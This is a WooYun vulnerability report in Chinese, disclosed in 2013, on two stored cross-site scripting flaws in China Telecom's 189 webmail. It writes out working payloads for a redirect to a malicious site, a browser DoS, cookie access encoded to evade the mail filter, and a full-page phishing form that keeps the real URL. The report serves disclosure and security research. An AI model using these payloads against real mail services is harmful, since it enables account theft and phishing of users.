当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032810

漏洞标题:中国电信189邮箱邮件内容存储型跨站两枚

相关厂商:中国电信

漏洞作者: Liuz5O69

提交时间:2013-07-30 14:37

修复时间:2013-09-13 14:37

公开时间:2013-09-13 14:37

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-30: 细节已通知厂商并且等待厂商处理中
2013-08-03: 厂商已经确认,细节仅向厂商公开
2013-08-13: 细节向核心白帽子及相关领域专家公开
2013-08-23: 细节向普通白帽子公开
2013-09-02: 细节向实习白帽子公开
2013-09-13: 细节向公众公开

简要描述:

189邮箱邮件正文对部分标签下的脚本过滤不严,导致存储型跨站漏洞,利用该漏洞可实施Cookie窃取、页面DoS、网页挂马、跨站钓鱼。

详细说明:

189邮箱邮件正文对marquee和div事件触发两种情况下的跨站脚本未进行过滤,导致攻击者可利用。例如提交:
<marquee behavior=slide onstart="alert('marquee_XSS')"></marquee>
<div style="color:#FFFFFF" onmouseenter="alert('ondri_div_XSS')">test</div>
在IE和火狐浏览器下可以触发(webkit内核不支持以上两种),如图IE内核360浏览器:

360.JPG


火狐浏览器如图:

fire1.JPG

漏洞证明:

1.提交如<marquee behavior=slide onstart="location.href='http://www.xmd5.org'"></marquee>可实施挂马攻击,如图:

mal.JPG


2.提交如<marquee scrollamount=1000 onstart="alert('DoooooooS...')"></marquee>可实施页面DoS,用户必须强制杀掉浏览器进程关闭,如图:

dos.JPG


3.Cookies窃取,提交
<marquee behavior=slide onstart="alert(&#x64;&#x6f;&#x63;&#x75;&#x6d;&#x65;&#x6e;&#x74;&#x2e;&#x63;&#x6f;&#x6f;&#x6b;&#x69;&#x65)"></marquee>
需要做编码转换,189邮箱对document.cookie做了邮件拦截,直接提交收不到邮件。

cookie.JPG


4.跨站钓鱼,提交:
<marquee behavior=slide onstart="top.window.setTimeout('document.writeln(&quot;This is a XSS Phishing Test...<p>&quot;);document.writeln(\'user:<input type=&quot;text&quot; name=&quot;textfield&quot; \/>pass:<input type=&quot;text&quot; name=&quot;textfield2&quot; \/><input type=&quot;submit&quot; name=&quot;Submit&quot; value=&quot;Submit&quot; \/>\')',2000)"></marquee>
可以实施跨站钓鱼,这里我简单的验证了下,和传统钓鱼不同,以上脚本会把189邮箱页面完全刷写成伪造页面,且能保证URL不变化,较传统钓鱼攻击欺骗性较大,如图:

phish.JPG


可以看到地址栏还是189邮箱正常URL,但是页面已经被强制刷成指定内容了

修复方案:

过滤

版权声明:转载请注明来源 Liuz5O69@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-08-03 17:18

厂商回复:

最新状态:

暂无